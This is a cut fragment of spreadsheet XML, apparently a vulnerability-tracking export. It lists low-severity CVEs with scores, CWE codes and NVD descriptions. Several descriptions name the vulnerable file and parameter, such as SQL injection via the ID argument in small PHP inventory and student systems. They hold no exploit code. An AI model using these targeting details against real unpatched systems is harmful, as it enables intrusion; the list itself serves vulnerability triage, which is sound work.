r="K1539" s="5" t="inlineStr" /><c r="L1539" s="5" t="inlineStr" /><c r="M1539" s="5" t="inlineStr" /><c r="N1539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1539" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1539" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1539" s="5" t="inlineStr" /><c r="R1539" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1539" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1539" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45525</t></is></c></row><row r="1540"><c r="A1540" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1540" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1540" s="5" t="inlineStr"><is><t>CVE-2026-55290</t></is></c><c r="D1540" s="5" t="n"><v>3.3</v></c><c r="E1540" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1540" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1540" s="5" t="inlineStr" /><c r="H1540" s="5" t="n"><v>0.001</v></c><c r="I1540" s="5" t="inlineStr" /><c r="J1540" s="5" t="inlineStr" /><c r="K1540" s="5" t="inlineStr" /><c r="L1540" s="5" t="inlineStr" /><c r="M1540" s="5" t="inlineStr" /><c r="N1540" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1540" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1540" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1540" s="5" t="inlineStr" /><c r="R1540" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S1540" s="5" t="inlineStr"><is><t>In setTo of ResourceTypes.cpp, there is a possible out-of-bounds heap read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1540" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55290</t></is></c></row><row r="1541"><c r="A1541" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1541" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1541" s="5" t="inlineStr"><is><t>CVE-2026-86564</t></is></c><c r="D1541" s="5" t="n"><v>3.3</v></c><c r="E1541" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1541" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1541" s="5" t="inlineStr" /><c r="H1541" s="5" t="n"><v>0.001</v></c><c r="I1541" s="5" t="inlineStr" /><c r="J1541" s="5" t="inlineStr" /><c r="K1541" s="5" t="inlineStr" /><c r="L1541" s="5" t="inlineStr" /><c r="M1541" s="5" t="inlineStr" /><c r="N1541" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1541" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1541" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1541" s="5" t="inlineStr" /><c r="R1541" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1541" s="5" t="inlineStr"><is><t>A flaw was found in DPDK lib/vhost. Missing length validation before reading command_data in the virtio-net control-queue handler can cause an out-of-bounds read and a host process crash.</t></is></c><c r="T1541" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86564</t></is></c></row><row r="1542"><c r="A1542" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1542" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1542" s="5" t="inlineStr"><is><t>CVE-2026-28652</t></is></c><c r="D1542" s="5" t="n"><v>3.1</v></c><c r="E1542" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1542" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1542" s="5" t="inlineStr" /><c r="H1542" s="5" t="n"><v>0.002</v></c><c r="I1542" s="5" t="inlineStr" /><c r="J1542" s="5" t="inlineStr" /><c r="K1542" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1542" s="5" t="inlineStr" /><c r="M1542" s="5" t="inlineStr" /><c r="N1542" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1542" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1542" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1542" s="5" t="inlineStr" /><c r="R1542" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1542" s="5" t="inlineStr"><is><t>In multiple functions of RangingServiceImpl.java, there is a possible MITM due to a missing permission check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1542" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28652</t></is></c></row><row r="1543"><c r="A1543" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1543" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1543" s="5" t="inlineStr"><is><t>CVE-2026-48707</t></is></c><c r="D1543" s="5" t="n"><v>3.1</v></c><c r="E1543" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1543" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1543" s="5" t="inlineStr" /><c r="H1543" s="5" t="n"><v>0.002</v></c><c r="I1543" s="5" t="inlineStr" /><c r="J1543" s="5" t="inlineStr" /><c r="K1543" s="5" t="inlineStr" /><c r="L1543" s="5" t="inlineStr" /><c r="M1543" s="5" t="inlineStr" /><c r="N1543" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1543" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1543" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1543" s="5" t="inlineStr" /><c r="R1543" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1543" s="5" t="inlineStr"><is><t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Server-Side Request Forgery (SSRF) vulnerability in the file upload functionality (`system/core/uploader.php` at lines 509-532). When the "upload from URL" feature follows an HTTP redirect, the redirected target URL bypasses the private IP address blacklist check. This allows authenticated users to scan and access internal network services. Version 2.18.2 contains a fix.</t></is></c><c r="T1543" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48707</t></is></c></row><row r="1544"><c r="A1544" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1544" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1544" s="5" t="inlineStr"><is><t>CVE-2026-84389</t></is></c><c r="D1544" s="5" t="n"><v>3.1</v></c><c r="E1544" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1544" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1544" s="5" t="inlineStr" /><c r="H1544" s="5" t="n"><v>0.001</v></c><c r="I1544" s="5" t="inlineStr" /><c r="J1544" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1544" s="5" t="inlineStr" /><c r="L1544" s="5" t="inlineStr" /><c r="M1544" s="5" t="inlineStr" /><c r="N1544" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1544" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1544" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1544" s="5" t="inlineStr" /><c r="R1544" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S1544" s="5" t="inlineStr"><is><t>A url redirection to untrusted site ('open redirect') vulnerability in Fortinet FortiSIEM 7.5.0 through 7.5.1, FortiSIEM 7.4.1 through 7.4.2 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t></is></c><c r="T1544" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84389</t></is></c></row><row r="1545"><c r="A1545" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1545" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1545" s="5" t="inlineStr"><is><t>CVE-2026-86670</t></is></c><c r="D1545" s="5" t="n"><v>2.9</v></c><c r="E1545" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1545" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1545" s="5" t="inlineStr" /><c r="H1545" s="5" t="n"><v>0.003</v></c><c r="I1545" s="5" t="inlineStr" /><c r="J1545" s="5" t="inlineStr" /><c r="K1545" s="5" t="inlineStr" /><c r="L1545" s="5" t="inlineStr" /><c r="M1545" s="5" t="inlineStr" /><c r="N1545" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1545" s="5" t="inlineStr" /><c r="R1545" s="5" t="inlineStr"><is><t>CWE-326, CWE-916</t></is></c><c r="S1545" s="5" t="inlineStr"><is><t>A flaw has been found in aircheng-org iWebShop-5 up to 5.15. This impacts an unknown function of the file controllers/admin.php of the component Authentication Storage. Executing a manipulation of the argument Password can lead to password hash with insufficient computational effort. It is possible to launch the attack remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1545" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86670</t></is></c></row><row r="1546"><c r="A1546" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1546" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1546" s="5" t="inlineStr"><is><t>CVE-2026-84392</t></is></c><c r="D1546" s="5" t="n"><v>2.7</v></c><c r="E1546" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1546" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1546" s="5" t="inlineStr" /><c r="H1546" s="5" t="n"><v>0.003</v></c><c r="I1546" s="5" t="inlineStr" /><c r="J1546" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1546" s="5" t="inlineStr" /><c r="L1546" s="5" t="inlineStr" /><c r="M1546" s="5" t="inlineStr" /><c r="N1546" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1546" s="5" t="inlineStr" /><c r="R1546" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1546" s="5" t="inlineStr"><is><t>A NULL Pointer Dereference vulnerability [CWE-476] vulnerability in Fortinet FortiOS 7.4 all versions, FortiOS 7.2 all versions, FortiPAM 1.9.0, FortiPAM 1.8 all versions, FortiPAM 1.7 all versions, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.6, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions may allow an authenticated attacker to crash the httpsd daemon via crafted HTTP requests.</t></is></c><c r="T1546" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84392</t></is></c></row><row r="1547"><c r="A1547" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1547" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1547" s="5" t="inlineStr"><is><t>CVE-2026-82060</t></is></c><c r="D1547" s="5" t="n"><v>2.3</v></c><c r="E1547" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1547" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1547" s="5" t="inlineStr" /><c r="H1547" s="5" t="n"><v>0.002</v></c><c r="I1547" s="5" t="inlineStr" /><c r="J1547" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1547" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1547" s="5" t="inlineStr" /><c r="M1547" s="5" t="inlineStr" /><c r="N1547" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1547" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1547" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1547" s="5" t="inlineStr" /><c r="R1547" s="5" t="inlineStr"><is><t>CWE-943</t></is></c><c r="S1547" s="5" t="inlineStr"><is><t>In MongoDB, insufficient validation of shard key values during document insertion allowed authenticated users to store documents with specially crafted, operator-shaped objects as shard key values in sharded collections. When change stream events for such documents were processed with the updateLookup full document mode, the crafted values were embedded into internal post-image lookup queries without proper sanitization, causing them to be interpreted as query operators rather than literal equality values. This could result in change stream consumers receiving incorrect post-image documents or encountering non-resumable fatal errors.</t></is></c><c r="T1547" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t></is></c></row><row r="1548"><c r="A1548" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1548" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1548" s="5" t="inlineStr"><is><t>CVE-2026-82710</t></is></c><c r="D1548" s="5" t="n"><v>2.3</v></c><c r="E1548" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1548" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1548" s="5" t="inlineStr" /><c r="H1548" s="5" t="n"><v>0.004</v></c><c r="I1548" s="5" t="inlineStr" /><c r="J1548" s="5" t="inlineStr" /><c r="K1548" s="5" t="inlineStr" /><c r="L1548" s="5" t="inlineStr" /><c r="M1548" s="5" t="inlineStr" /><c r="N1548" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1548" s="5" t="inlineStr" /><c r="R1548" s="5" t="inlineStr"><is><t>CWE-150</t></is></c><c r="S1548" s="5" t="inlineStr"><is><t>Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in ash-project usage_rules allows a malicious package publisher to inject terminal control sequences into the output of mix usage_rules.search_docs.

mix usage_rules.search_docs searches Hex documentation through search.hexdocs.pm, which indexes the documentation of every published package, and prints the matching results (title, package, type, doc reference, and highlighted snippets) to the terminal. The formatter in Mix.Tasks.UsageRules.SearchDocs interpolated those publisher-controlled fields verbatim, neutralizing no terminal control characters; the only transform it applied adds escape sequences rather than removing them. A malicious package can embed ANSI terminal escape sequences (cursor movement, line erase, carriage returns, OSC 52 clipboard writes) in its indexed documentation, so when a developer runs a search that surfaces those docs the sequences reach the terminal unchanged — forging the displayed hexdocs URL or a suggested command, hiding text, or writing to the clipboard. No authentication or privileged position is required; only publishing a package.

This issue affects usage_rules: from 0.1.18 before 1.2.8.</t></is></c><c r="T1548" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82710</t></is></c></row><row r="1549"><c r="A1549" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1549" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1549" s="5" t="inlineStr"><is><t>CVE-2026-58234</t></is></c><c r="D1549" s="5" t="n"><v>2.2</v></c><c r="E1549" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1549" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1549" s="5" t="inlineStr" /><c r="H1549" s="5" t="n"><v>0.002</v></c><c r="I1549" s="5" t="inlineStr" /><c r="J1549" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1549" s="5" t="inlineStr" /><c r="L1549" s="5" t="inlineStr" /><c r="M1549" s="5" t="inlineStr" /><c r="N1549" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1549" s="5" t="inlineStr" /><c r="R1549" s="5" t="inlineStr"><is><t>CWE-776</t></is></c><c r="S1549" s="5" t="inlineStr"><is><t>SAP Process Integration (SOAP Adapter) allows a privileged user to send specially crafted requests containing deeply nested entity definitions, which under certain conditions could temporarily increase processor load and degrade system responsiveness. Successful exploitation results in low impact on availability with no impact on confidentiality and integrity.</t></is></c><c r="T1549" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58234</t></is></c></row><row r="1550"><c r="A1550" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1550" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1550" s="5" t="inlineStr"><is><t>CVE-2026-86512</t></is></c><c r="D1550" s="5" t="n"><v>2.1</v></c><c r="E1550" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1550" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1550" s="5" t="inlineStr" /><c r="H1550" s="5" t="n"><v>0.002</v></c><c r="I1550" s="5" t="inlineStr" /><c r="J1550" s="5" t="inlineStr" /><c r="K1550" s="5" t="inlineStr" /><c r="L1550" s="5" t="inlineStr" /><c r="M1550" s="5" t="inlineStr" /><c r="N1550" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1550" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1550" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1550" s="5" t="inlineStr" /><c r="R1550" s="5" t="inlineStr"><is><t>CWE-266, CWE-284</t></is></c><c r="S1550" s="5" t="inlineStr"><is><t>A vulnerability was identified in java-json-tools json-patch up to 1.13. This affects the function CopyOperation.apply/MoveOperation.apply of the file src/main/java/com/github/fge/jsonpatch/CopyOperation.java of the component Copy Move Operations. The manipulation leads to improper access controls. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1550" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86512</t></is></c></row><row r="1551"><c r="A1551" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1551" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1551" s="5" t="inlineStr"><is><t>CVE-2026-86514</t></is></c><c r="D1551" s="5" t="n"><v>2.1</v></c><c r="E1551" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1551" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1551" s="5" t="inlineStr" /><c r="H1551" s="5" t="n"><v>0.003</v></c><c r="I1551" s="5" t="inlineStr" /><c r="J1551" s="5" t="inlineStr" /><c r="K1551" s="5" t="inlineStr" /><c r="L1551" s="5" t="inlineStr" /><c r="M1551" s="5" t="inlineStr" /><c r="N1551" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1551" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1551" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1551" s="5" t="inlineStr" /><c r="R1551" s="5" t="inlineStr"><is><t>CWE-119, CWE-121</t></is></c><c r="S1551" s="5" t="inlineStr"><is><t>A weakness has been identified in vgmstream up to r2117. This issue affects the function sscanf of the file src/meta/txth.c of the component txth-txtp. This manipulation causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. Patch name: 4669d37a6af94866f6f0628678f9f90d46954e8b. To fix this issue, it is recommended to deploy a patch.</t></is></c><c r="T1551" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86514</t></is></c></row><row r="1552"><c r="A1552" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1552" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1552" s="5" t="inlineStr"><is><t>CVE-2026-86515</t></is></c><c r="D1552" s="5" t="n"><v>2.1</v></c><c r="E1552" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1552" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1552" s="5" t="inlineStr" /><c r="H1552" s="5" t="n"><v>0.003</v></c><c r="I1552" s="5" t="inlineStr" /><c r="J1552" s="5" t="inlineStr" /><c r="K1552" s="5" t="inlineStr" /><c r="L1552" s="5" t="inlineStr" /><c r="M1552" s="5" t="inlineStr" /><c r="N1552" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1552" s="5" t="inlineStr" /><c r="R1552" s="5" t="inlineStr"><is><t>CWE-400, CWE-404</t></is></c><c r="S1552" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in vgmstream up to r2117. Impacted is the function add_entry of the file src/meta/txtp_parser.c of the component txtp. Such manipulation of the argument range_start/range_end leads to resource consumption. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 4b6a02dd1aff6428255db912563d77d4cb0a143e. It is advisable to implement a patch to correct this issue.</t></is></c><c r="T1552" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86515</t></is></c></row><row r="1553"><c r="A1553" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1553" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1553" s="5" t="inlineStr"><is><t>CVE-2026-86517</t></is></c><c r="D1553" s="5" t="n"><v>2.1</v></c><c r="E1553" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1553" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1553" s="5" t="inlineStr" /><c r="H1553" s="5" t="n"><v>0.002</v></c><c r="I1553" s="5" t="inlineStr" /><c r="J1553" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1553" s="5" t="inlineStr" /><c r="L1553" s="5" t="inlineStr" /><c r="M1553" s="5" t="inlineStr" /><c r="N1553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1553" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1553" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1553" s="5" t="inlineStr" /><c r="R1553" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1553" s="5" t="inlineStr"><is><t>A flaw has been found in itsourcecode Sales and Inventory System 1.0. The impacted element is the function mysqli_query of the file /pages/us_searchfrm.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.</t></is></c><c r="T1553" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86517</t></is></c></row><row r="1554"><c r="A1554" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1554" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1554" s="5" t="inlineStr"><is><t>CVE-2026-86518</t></is></c><c r="D1554" s="5" t="n"><v>2.1</v></c><c r="E1554" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1554" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1554" s="5" t="inlineStr" /><c r="H1554" s="5" t="n"><v>0.002</v></c><c r="I1554" s="5" t="inlineStr" /><c r="J1554" s="5" t="inlineStr" /><c r="K1554" s="5" t="inlineStr" /><c r="L1554" s="5" t="inlineStr" /><c r="M1554" s="5" t="inlineStr" /><c r="N1554" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1554" s="5" t="inlineStr" /><c r="R1554" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1554" s="5" t="inlineStr"><is><t>A vulnerability has been found in code-projects Student Crud Operation 1.0. This affects an unknown function of the file /edit.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t></is></c><c r="T1554" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86518</t></is></c></row><row r="1555"><c r="A1555" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1555" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1555" s="5" t="inlineStr"><is><t>CVE-2026-86668</t></is></c><c r="D1555" s="5" t="n"><v>2.1</v></c><c r="E1555" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1555" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1555" s="5" t="inlineStr" /><c r="H1555" s="5" t="n"><v>0.003</v></c><c r="I1555" s="5" t="inlineStr" /><c r="J1555" s="5" t="inlineStr" /><c r="K1555" s="5" t="inlineStr" /><c r="L1555" s="5" t="inlineStr" /><c r="M1555" s="5" t="inlineStr" /><c r="N1555" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1555" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1555" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1555" s="5" t="inlineStr" /><c r="R1555" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="S1555" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in aircheng-org iWebShop-5 up to 5.15. The impacted element is the function uploadFile of the file controllers/pic.php. Such manipulation of the argument outerSrc/selectPhoto leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1555" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86668</t></is></c></row><row r="1556"><c r="A1556" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1556" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1556" s="5" t="inlineStr"><is><t>CVE-2026-86674</t></is></c><c r="D1556" s="5" t="n"><v>2.1</v></c><c r="E1556" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1556" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1556" s="5" t="inlineStr" /><c r="H1556" s="5" t="n"><v>0.002</v></c><c r="I1556" s="5" t="inlineStr" /><c r="J1556" s="5" t="inlineStr" /><c r="K1556" s="5" t="inlineStr" /><c r="L1556" s="5" t="inlineStr" /><c r="M1556" s="5" t="inlineStr" /><c r="N1556" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1556" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1556" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1556" s="5" t="inlineStr" /><c r="R1556" s="5" t="inlineStr"><is><t>CWE-384</t></is></c><c r="S1556" s="5" t="inlineStr"><is><t>A vulnerability was found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this vulnerability is the function session_start of the file login.php. The manipulation results in session fixiation. The attack can be launched remotely. The exploit has been made public and could be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1556" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86674</t></is></c></row><row r="1557"><c r="A1557" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1557" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1557" s="5" t="inlineStr"><is><t>CVE-2026-86675</t></is></c><c r="D1557" s="5" t="n"><v>2.1</v></c><c r="E1557" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1557" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1557" s="5" t="inlineStr" /><c r="H1557" s="5" t="n"><v>0.002</v></c><c r="I1557" s="5" t="inlineStr" /><c r="J1557" s="5" t="inlineStr" /><c r="K1557" s="5" t="inlineStr" /><c r="L1557" s="5" t="inlineStr" /><c r="M1557" s="5" t="inlineStr" /><c r="N1557" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1557" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1557" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1557" s="5" t="inlineStr" /><c r="R1557" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1557" s="5" t="inlineStr"><is><t>A vulnerability was identified in itsourcecode Sales and Inventory System 1.0. This affects an unknown part of the file /pages/us_edit.php. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used.</t></is></c><c r="T1557" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86675</t></is></c></row><row r="1558"><c r="A1558" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1558" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1558" s="5" t="inlineStr"><is><t>CVE-2026-16003</t></is></c><c r="D1558" s="5" t="n"><v>2</v></c><c r="E1558" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1558" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1558" s="5" t="inlineStr" /><c r="H1558" s="5" t="n"><v>0.001</v></c><c r="I1558" s="5" t="inlineStr" /><c r="J1558" s="5" t="inlineStr" /><c r="K1558" s="5" 